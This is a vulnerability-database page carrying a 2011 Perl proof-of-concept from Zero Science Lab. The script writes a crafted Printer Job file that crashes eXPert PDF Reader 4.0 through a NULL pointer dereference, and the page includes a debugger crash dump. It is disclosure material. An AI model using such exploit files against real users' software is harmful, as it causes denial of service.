Vulners
Lucene search
eXPert PDF Reader 4.0 NULL Pointer Dereference / Heap Corruption
`#!/usr/local/bin/perl
#
#
# eXPert PDF Reader 4.0 NULL Pointer Dereference and Heap Corruption Denial Of Service
#
#
# Vendor: Visagesoft
# Product web page: http://www.visagesoft.com
# Affected version: 4.0.210
#
# Summary: eXPert PDF Reader is a free pdf viewer software that lets you view and print
# pdf documents on windows operating systems.
#
# Desc: The vulnerability is caused due to a NULL pointer dereference when processing
# malicious Printer Job (.pj) files and can be exploited to crash the application and
# cause a heap corruption and denial of service scenarios.
#
# Tested on: Microsoft Windows XP Professional SP3 (EN)
#
# ----------------------------------------------------------------------------------
#
# HEAP[vspdfreader.exe]: Invalid allocation size - 82828290 (exceeded 7ffdefff)
# (77c.d48): Unknown exception - code 0eedfade (first chance)
# (77c.d48): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000001 ebx=02d7a188 ecx=00bd311c edx=00000002 esi=00000002 edi=0012fe24
# eip=00446cc9 esp=0012fb6c ebp=0012fb84 iopl=0 nv up ei ng nz ac pe cy
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210297
# *** WARNING: Unable to verify checksum for image00400000
# *** ERROR: Module load completed but symbols could not be loaded for image00400000
# image00400000+0x46cc9:
# 00446cc9 8b04b0 mov eax,dword ptr [eax+esi*4] ds:0023:00000009=????????
#
# image00400000+0x46cc9:
# 00446cc9 8b04b0 mov eax,dword ptr [eax+esi*4]
# 00446ccc 5e pop esi
# 00446ccd 5b pop ebx
# 00446cce c3 ret
# 00446ccf 90 nop
# 00446cd0 8bc8 mov ecx,eax
# 00446cd2 b201 mov dl,1
# 00446cd4 a1f48d4300 mov eax,dword ptr [image00400000+0x38df4 (00438df4)]
#
# image00400000+0x38df4:
# 00438df4 4c dec esp
# 00438df5 8e4300 mov es,word ptr [ebx]
# 00438df8 0000 add byte ptr [eax],al
# 00438dfa 0000 add byte ptr [eax],al
# 00438dfc 0000 add byte ptr [eax],al
# 00438dfe 0000 add byte ptr [eax],al
# 00438e00 0000 add byte ptr [eax],al
# 00438e02 0000 add byte ptr [eax],al
#
# ----------------------------------------------------------------------------------
#
# Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# Zero Science Lab - http://www.zeroscience.mk
#
# Advisory ID: ZSL-2011-5000
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5000.php
#
#
# 25.02.2011
#
my $file = "dniz0r.pj";
my $data = ""; #my $data = "J" x(2+2);
open($FILE,">$file");
print $FILE $data;
close($FILE);
print "\npj File Created successfully\n";
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Feb 2011 00:00Current
0.6Low risk
Vulners AI Score0.6